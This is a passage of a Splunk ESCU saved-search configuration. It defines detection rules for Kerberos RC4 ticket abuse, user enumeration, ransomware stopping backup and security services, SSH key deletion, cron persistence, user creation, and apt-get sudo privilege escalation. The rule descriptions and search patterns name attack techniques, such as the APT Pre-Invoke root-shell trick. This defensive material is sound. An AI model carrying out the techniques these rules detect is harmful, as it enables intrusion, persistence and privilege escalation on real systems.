`wineventlog_security` EventCode=4769 Service_Name="*$" (Ticket_Options=0x40810000 OR Ticket_Options=0x40800000 OR Ticket_Options=0x40810010) Ticket_Encryption_Type=0x17 | stats count min(_time) as firstTime max(_time) as lastTime by dest, service, service_id, Ticket_Encryption_Type, Ticket_Options | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `kerberos_service_ticket_request_using_rc4_encryption_filter` [ESCU - Kerberos TGT Request Using RC4 Encryption - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Event 4768, A Kerberos authentication ticket (TGT) was requested, to identify a TGT request with encryption type 0x17, or RC4-HMAC. This encryption type is no longer utilized by newer systems and could represent evidence of an OverPass The Hash attack. Similar to Pass The Hash, OverPass The Hash is a form of credential theft that allows adversaries to move laterally or consume resources in a target network. Leveraging this attack, an adversary who has stolen the NTLM hash of a valid domain account is able to authenticate to the Kerberos Distribution Center(KDC) on behalf of the legitimate account and obtain a Kerberos TGT ticket. Depending on the privileges of the compromised account, this ticket may be used to obtain unauthorized access to systems and other network resources. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Event 4768, A Kerberos authentication ticket (TGT) was requested, to identify a TGT request with encryption type 0x17, or RC4-HMAC. This encryption type is no longer utilized by newer systems and could represent evidence of an OverPass The Hash attack. Similar to Pass The Hash, OverPass The Hash is a form of credential theft that allows adversaries to move laterally or consume resources in a target network. Leveraging this attack, an adversary who has stolen the NTLM hash of a valid domain account is able to authenticate to the Kerberos Distribution Center(KDC) on behalf of the legitimate account and obtain a Kerberos TGT ticket. Depending on the privileges of the compromised account, this ticket may be used to obtain unauthorized access to systems and other network resources. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = Based on Microsoft documentation, legacy systems or applications will use RC4-HMAC as the default encryption for TGT requests. Specifically, systems before Windows Server 2008 and Windows Vista. Newer systems will use AES128 or AES256. action.escu.creation_date = 2022-03-04 action.escu.modification_date = 2022-03-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Kerberos TGT Request Using RC4 Encryption - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = A Kerberos TGT request with RC4 encryption was requested for $Account_Name$ from $Client_Address$ action.risk.param._risk = [{"risk_object_field": "Client_Address", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kerberos TGT Request Using RC4 Encryption - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1550"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = The following analytic leverages Event 4768, A Kerberos authentication ticket (TGT) was requested, to identify a TGT request with encryption type 0x17, or RC4-HMAC. This encryption type is no longer utilized by newer systems and could represent evidence of an OverPass The Hash attack. Similar to Pass The Hash, OverPass The Hash is a form of credential theft that allows adversaries to move laterally or consume resources in a target network. Leveraging this attack, an adversary who has stolen the NTLM hash of a valid domain account is able to authenticate to the Kerberos Distribution Center(KDC) on behalf of the legitimate account and obtain a Kerberos TGT ticket. Depending on the privileges of the compromised account, this ticket may be used to obtain unauthorized access to systems and other network resources. action.notable.param.rule_title = Kerberos TGT Request Using RC4 Encryption action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4768 Ticket_Encryption_Type=0x17 Account_Name!=*$ | stats count min(_time) as firstTime max(_time) as lastTime by Account_Name Client_Address dest | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `kerberos_tgt_request_using_rc4_encryption_filter` [ESCU - Kerberos User Enumeration - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic leverages Event Id 4768, A Kerberos authentication ticket (TGT) was requested, to identify one source endpoint trying to obtain an unusual number Kerberos TGT ticket for non existing users. This behavior could represent an adversary abusing the Kerberos protocol to perform a user enumeration attack against an Active Directory environment. When Kerberos is sent a TGT request with no preauthentication for an invalid username, it responds with KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN or 0x6. Red teams and adversaries alike may abuse the Kerberos protocol to validate a list of users use them to perform further attacks.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number requests. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1589", "T1589.002"], "nist": ["DE.AE"]} action.escu.data_models = [] action.escu.eli5 = The following analytic leverages Event Id 4768, A Kerberos authentication ticket (TGT) was requested, to identify one source endpoint trying to obtain an unusual number Kerberos TGT ticket for non existing users. This behavior could represent an adversary abusing the Kerberos protocol to perform a user enumeration attack against an Active Directory environment. When Kerberos is sent a TGT request with no preauthentication for an invalid username, it responds with KRB5KDC_ERR_C_PRINCIPAL_UNKNOWN or 0x6. Red teams and adversaries alike may abuse the Kerberos protocol to validate a list of users use them to perform further attacks.\ The detection calculates the standard deviation for each host and leverages the 3-sigma statistical rule to identify an unusual number requests. To customize this analytic, users can try different combinations of the `bucket` span time and the calculation of the `upperBound` field. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting Domain Controller and Kerberos events. The Advanced Security Audit policy setting `Audit Kerberos Authentication Service` within `Account Logon` needs to be enabled. action.escu.known_false_positives = Possible false positive scenarios include but are not limited to vulnerability scanners and missconfigured systems. action.escu.creation_date = 2022-03-10 action.escu.modification_date = 2022-03-10 action.escu.confidence = high action.escu.full_search_name = ESCU - Kerberos User Enumeration - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Microsoft Windows"] action.escu.analytic_story = ["Active Directory Kerberos Attacks"] action.risk = 1 action.risk.param._risk_message = Potential Kerberos based user enumeration attack $Client_Address$ action.risk.param._risk = [{"risk_object_field": "Client_Address", "risk_object_type": "system", "risk_score": 24}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Kerberos User Enumeration - Rule action.correlationsearch.annotations = {"analytic_story": ["Active Directory Kerberos Attacks"], "cis20": ["CIS 10"], "confidence": 80, "impact": 30, "kill_chain_phases": ["Reconnaissance"], "mitre_attack": ["T1589", "T1589.002"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_security` EventCode=4768 Result_Code=0x6 Account_Name!="*$" | bucket span=2m _time | stats dc(Account_Name) AS unique_accounts values(Account_Name) as tried_accounts by _time, Client_Address | eventstats avg(unique_accounts) as comp_avg , stdev(unique_accounts) as comp_std by Client_Address | eval upperBound=(comp_avg+comp_std*3) | eval isOutlier=if(unique_accounts > 10 and unique_accounts >= upperBound, 1, 0) | search isOutlier=1 | `kerberos_user_enumeration_filter` [ESCU - Known Services Killed by Ransomware - Rule] action.escu = 0 action.escu.enabled = 1 description = This search detects a suspicioous termination of known services killed by ransomware before encrypting files in a compromised machine. This technique is commonly seen in most of ransomware now a days to avoid exception error while accessing the targetted files it wants to encrypts because of the open handle of those services to the targetted file. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} action.escu.data_models = [] action.escu.eli5 = This search detects a suspicioous termination of known services killed by ransomware before encrypting files in a compromised machine. This technique is commonly seen in most of ransomware now a days to avoid exception error while accessing the targetted files it wants to encrypts because of the open handle of those services to the targetted file. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the 7036 EventCode ScManager in System audit Logs from your endpoints. action.escu.known_false_positives = Admin activities or installing related updates may do a sudden stop to list of services we monitor. action.escu.creation_date = 2021-06-04 action.escu.modification_date = 2021-06-04 action.escu.confidence = high action.escu.full_search_name = ESCU - Known Services Killed by Ransomware - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = null action.escu.analytic_story = ["Ransomware", "BlackMatter Ransomware", "LockBit Ransomware"] action.risk = 1 action.risk.param._risk_message = Known services $Message$ terminated by a potential ransomware on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 72}, {"risk_object_field": "Message", "risk_object_type": "other", "risk_score": 72}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Known Services Killed by Ransomware - Rule action.correlationsearch.annotations = {"analytic_story": ["Ransomware", "BlackMatter Ransomware", "LockBit Ransomware"], "cis20": ["CIS 10"], "confidence": 80, "impact": 90, "kill_chain_phases": ["Actions on Objectives"], "mitre_attack": ["T1490"], "nist": ["DE.CM"]} schedule_window = auto action.notable = 1 action.notable.param.nes_fields = user,dest action.notable.param.rule_description = This search detects a suspicioous termination of known services killed by ransomware before encrypting files in a compromised machine. This technique is commonly seen in most of ransomware now a days to avoid exception error while accessing the targetted files it wants to encrypts because of the open handle of those services to the targetted file. action.notable.param.rule_title = Known Services Killed by Ransomware action.notable.param.security_domain = endpoint action.notable.param.severity = high alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = `wineventlog_system` EventCode=7036 Message IN ("*Volume Shadow Copy*","*VSS*", "*backup*", "*sophos*", "*sql*", "*memtas*", "*mepocs*", "*veeam*", "*svc$*", "DefWatch", "ccEvtMgr", "ccSetMgr", "SavRoam", "RTVscan", "QBFCService", "QBIDPService", "Intuit.QuickBooks.FCS", "QBCFMonitorService" "YooBackup", "YooIT", "*Veeam*", "PDVFSService", "BackupExecVSSProvider", "BackupExecAgentAccelerator", "BackupExec*", "WdBoot", "WdFilter", "WdNisDrv", "WdNisSvc", "WinDefend", "wscsvc", "Sense", "sppsvc", "SecurityHealthService") Message="*service entered the stopped state*" | stats count min(_time) as firstTime max(_time) as lastTime by EventCode Message dest Type | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `known_services_killed_by_ransomware_filter` [ESCU - Linux Account Manipulation Of SSH Config and Keys - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic is to detect a deletion of ssh key in a linux machine. attacker may delete or modify ssh key to impair some security features or act as defense evasion in compromised linux machine. This Anomaly can be also a good indicator of a malware trying to wipe or delete several files in a compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic is to detect a deletion of ssh key in a linux machine. attacker may delete or modify ssh key to impair some security features or act as defense evasion in compromised linux machine. This Anomaly can be also a good indicator of a malware trying to wipe or delete several files in a compromised host as part of its destructive payload like what acidrain malware does in linux or router machines. This detection can be a good pivot to check what process and user tries to delete this type of files which is not so common and need further investigation. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the process name, parent process, and command-line executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-27 action.escu.modification_date = 2023-04-27 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Account Manipulation Of SSH Config and Keys - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["AcidRain"] action.risk = 1 action.risk.param._risk_message = SSH Config and keys are deleted on $dest$ by Process GUID - $process_guid$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 49}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Account Manipulation Of SSH Config and Keys - Rule action.correlationsearch.annotations = {"analytic_story": ["AcidRain"], "cis20": ["CIS 10"], "confidence": 70, "impact": 70, "kill_chain_phases": ["Actions on Objectives", "Exploitation"], "mitre_attack": ["T1485", "T1070.004", "T1070"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.action=deleted AND Filesystem.file_path IN ("/etc/ssh/*", "~/.ssh/*") by _time span=1h Filesystem.file_name Filesystem.file_path Filesystem.dest Filesystem.process_guid Filesystem.action | `drop_dm_object_name(Filesystem)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)`| `linux_account_manipulation_of_ssh_config_and_keys_filter` [ESCU - Linux Add Files In Known Crontab Directories - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic aims to detect unauthorized activities through suspicious file creation in recognized cron table directories, prevalent Unix-based locations for scheduling tasks. This behavior is often exploited by nefarious entities like malware or threat actors, including red teamers, to establish persistence on a targeted or compromised host. The analogy to Windows-based scheduled tasks helps explain the utility of a crontab or cron job. To enhance clarity and actionable intelligence, the anomaly query flags the anomaly, urging further investigation into the added file's details. A cybersecurity analyst should consider additional data points such as the user identity involved, the file's nature and purpose, file origin, timestamp, and any changes in system behavior post file execution. This comprehensive understanding aids in accurately determining the file's legitimacy, facilitating prompt and effective response actions. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic aims to detect unauthorized activities through suspicious file creation in recognized cron table directories, prevalent Unix-based locations for scheduling tasks. This behavior is often exploited by nefarious entities like malware or threat actors, including red teamers, to establish persistence on a targeted or compromised host. The analogy to Windows-based scheduled tasks helps explain the utility of a crontab or cron job. To enhance clarity and actionable intelligence, the anomaly query flags the anomaly, urging further investigation into the added file's details. A cybersecurity analyst should consider additional data points such as the user identity involved, the file's nature and purpose, file origin, timestamp, and any changes in system behavior post file execution. This comprehensive understanding aids in accurately determining the file's legitimacy, facilitating prompt and effective response actions. action.escu.how_to_implement = To successfully implement this search, you need to be ingesting logs with the file name, file path, and process_guid executions from your endpoints. If you are using Sysmon, you can use the Add-on for Linux Sysmon from Splunkbase. action.escu.known_false_positives = Administrator or network operator can create file in crontab folders for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-17 action.escu.modification_date = 2021-12-17 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Add Files In Known Crontab Directories - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"] action.risk = 1 action.risk.param._risk_message = a file $file_name$ is created in $file_path$ on $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 25}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Add Files In Known Crontab Directories - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques", "Linux Living Off The Land", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime FROM datamodel=Endpoint.Filesystem where Filesystem.file_path IN ("*/etc/cron*", "*/var/spool/cron/*") by Filesystem.dest Filesystem.file_create_time Filesystem.file_name Filesystem.process_guid Filesystem.file_path | `drop_dm_object_name(Filesystem)` | `security_content_ctime(lastTime)` | `security_content_ctime(firstTime)` | `linux_add_files_in_known_crontab_directories_filter` [ESCU - Linux Add User Account - Rule] action.escu = 0 action.escu.enabled = 1 description = This analytic looks for commands to create user accounts on the linux platform. This technique is commonly abuse by adversaries, malware author and red teamers to persist on the targeted or compromised host by creating new user with an elevated privilege. This Hunting query may catch normal creation of user by administrator so filter is needed. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = This analytic looks for commands to create user accounts on the linux platform. This technique is commonly abuse by adversaries, malware author and red teamers to persist on the targeted or compromised host by creating new user with an elevated privilege. This Hunting query may catch normal creation of user by administrator so filter is needed. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can execute this command. Please update the filter macros to remove false positives. action.escu.creation_date = 2021-12-21 action.escu.modification_date = 2021-12-21 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Add User Account - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Persistence Techniques"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Add User Account - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Persistence Techniques"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation"], "mitre_attack": ["T1136.001", "T1136"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count from datamodel=Endpoint.Processes where Processes.process_name IN ("useradd", "adduser") OR Processes.process IN ("*useradd *", "*adduser *") by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_add_user_account_filter` [ESCU - Linux Adding Crontab Using List Parameter - Rule] action.escu = 0 action.escu.enabled = 1 description = The following analytic identifies suspicious modifications to cron jobs on Linux systems using the crontab command with list parameters. This command line parameter can be abused by malware like Industroyer2, as well as adversaries and red teamers, to add a crontab entry for executing their malicious code on a schedule of their choice. However, it's important to note that administrators or normal users may also use this command for legitimate automation purposes, so filtering is required to minimize false positives. Identifying the modification of cron jobs using list parameters is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is detected, further investigation should be conducted to analyze the added cron job, its associated command, and the impact it may have on the system. This includes examining the purpose of the job, reviewing any on-disk artifacts, and identifying any related processes or activities occurring concurrently. The impact of a true positive can range from unauthorized execution of malicious code to data destruction or other damaging outcomes. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The following analytic identifies suspicious modifications to cron jobs on Linux systems using the crontab command with list parameters. This command line parameter can be abused by malware like Industroyer2, as well as adversaries and red teamers, to add a crontab entry for executing their malicious code on a schedule of their choice. However, it's important to note that administrators or normal users may also use this command for legitimate automation purposes, so filtering is required to minimize false positives. Identifying the modification of cron jobs using list parameters is valuable for a SOC as it indicates potential malicious activity or an attempt to establish persistence on the system. If a true positive is detected, further investigation should be conducted to analyze the added cron job, its associated command, and the impact it may have on the system. This includes examining the purpose of the job, reviewing any on-disk artifacts, and identifying any related processes or activities occurring concurrently. The impact of a true positive can range from unauthorized execution of malicious code to data destruction or other damaging outcomes. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = Administrator or network operator can use this application for automation purposes. Please update the filter macros to remove false positives. action.escu.creation_date = 2023-04-14 action.escu.modification_date = 2023-04-14 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux Adding Crontab Using List Parameter - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Industroyer2", "Linux Privilege Escalation", "Linux Living Off The Land", "Data Destruction", "Linux Persistence Techniques", "Scheduled Tasks"] cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux Adding Crontab Using List Parameter - Rule action.correlationsearch.annotations = {"analytic_story": ["Industroyer2", "Linux Privilege Escalation", "Linux Living Off The Land", "Data Destruction", "Linux Persistence Techniques", "Scheduled Tasks"], "cis20": ["CIS 10"], "confidence": 50, "impact": 50, "kill_chain_phases": ["Installation", "Exploitation"], "mitre_attack": ["T1053.003", "T1053"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process_name = "crontab" Processes.process= "* -l*" by Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.dest Processes.user | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_adding_crontab_using_list_parameter_filter` [ESCU - Linux apt-get Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = The apt-get is a command line tool for interacting with the Advanced Package Tool (APT) library (a package management system for Linux distributions). It allows you to search for, install, manage, update, and remove software. The tool does not build software from the source code. If sudo right is given to the tool for user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = The apt-get is a command line tool for interacting with the Advanced Package Tool (APT) library (a package management system for Linux distributions). It allows you to search for, install, manage, update, and remove software. The tool does not build software from the source code. If sudo right is given to the tool for user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux apt-get Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux apt-get Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux Living Off The Land"], "cis20": ["CIS 10"], "confidence": 50, "impact": 20, "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} schedule_window = auto alert.digest_mode = 1 disabled = true enableSched = 1 allow_skew = 100% counttype = number of events relation = greater than quantity = 0 realtime_schedule = 0 is_visible = false search = | tstats `security_content_summariesonly` count min(_time) as firstTime max(_time) as lastTime from datamodel=Endpoint.Processes where Processes.process="*apt-get*" AND Processes.process="*APT::Update::Pre-Invoke::*" AND Processes.process="*sudo*" by Processes.dest Processes.user Processes.parent_process_name Processes.process_name Processes.process Processes.process_id Processes.parent_process_id Processes.process_guid | `drop_dm_object_name(Processes)` | `security_content_ctime(firstTime)` | `security_content_ctime(lastTime)` | `linux_apt_get_privilege_escalation_filter` [ESCU - Linux APT Privilege Escalation - Rule] action.escu = 0 action.escu.enabled = 1 description = Advanced Package Tool, more commonly known as APT, is a collection of tools used to install, update, remove, and otherwise manage software packages on Debian and its derivative operating systems, including Ubuntu and Linux Mint. If sudo right is given to the tool for user, then the user can run system commands as root and possibly get a root shell. action.escu.mappings = {"cis20": ["CIS 10"], "kill_chain_phases": ["Exploitation"], "mitre_attack": ["T1548.003", "T1548"], "nist": ["DE.AE"]} action.escu.data_models = ["Endpoint"] action.escu.eli5 = Advanced Package Tool, more commonly known as APT, is a collection of tools used to install, update, remove, and otherwise manage software packages on Debian and its derivative operating systems, including Ubuntu and Linux Mint. If sudo right is given to the tool for user, then the user can run system commands as root and possibly get a root shell. action.escu.how_to_implement = The detection is based on data that originates from Endpoint Detection and Response (EDR) agents. These agents are designed to provide security-related telemetry from the endpoints where the agent is installed. To implement this search, you must ingest logs that contain the process GUID, process name, and parent process. Additionally, you must ingest complete command-line executions. These logs must be processed using the appropriate Splunk Technology Add-ons that are specific to the EDR product. The logs must also be mapped to the `Processes` node of the `Endpoint` data model. Use the Splunk Common Information Model (CIM) to normalize the field names and speed up the data modeling process. action.escu.known_false_positives = False positives may be present, filter as needed. action.escu.creation_date = 2022-08-11 action.escu.modification_date = 2022-08-11 action.escu.confidence = high action.escu.full_search_name = ESCU - Linux APT Privilege Escalation - Rule action.escu.search_type = detection action.escu.product = ["Splunk Enterprise", "Splunk Enterprise Security", "Splunk Cloud"] action.escu.providing_technologies = ["Sysmon", "Microsoft Windows", "Carbon Black Response", "CrowdStrike Falcon", "Symantec Endpoint Protection"] action.escu.analytic_story = ["Linux Privilege Escalation", "Linux Living Off The Land"] action.risk = 1 action.risk.param._risk_message = An instance of $parent_process_name$ spawning $process_name$ was identified on endpoint $dest$ action.risk.param._risk = [{"risk_object_field": "dest", "risk_object_type": "system", "risk_score": 10}, {"risk_object_field": "parent_process_name", "risk_object_type": "other", "risk_score": 10}, {"risk_object_field": "process_name", "risk_object_type": "other", "risk_score": 10}] action.risk.param._risk_score = 0 action.risk.param.verbose = 0 cron_schedule = 0 * * * * dispatch.earliest_time = -70m@m dispatch.latest_time = -10m@m action.correlationsearch.enabled = 1 action.correlationsearch.label = ESCU - Linux APT Privilege Escalation - Rule action.correlationsearch.annotations = {"analytic_story": ["Linux Privilege Escalation", "Linux 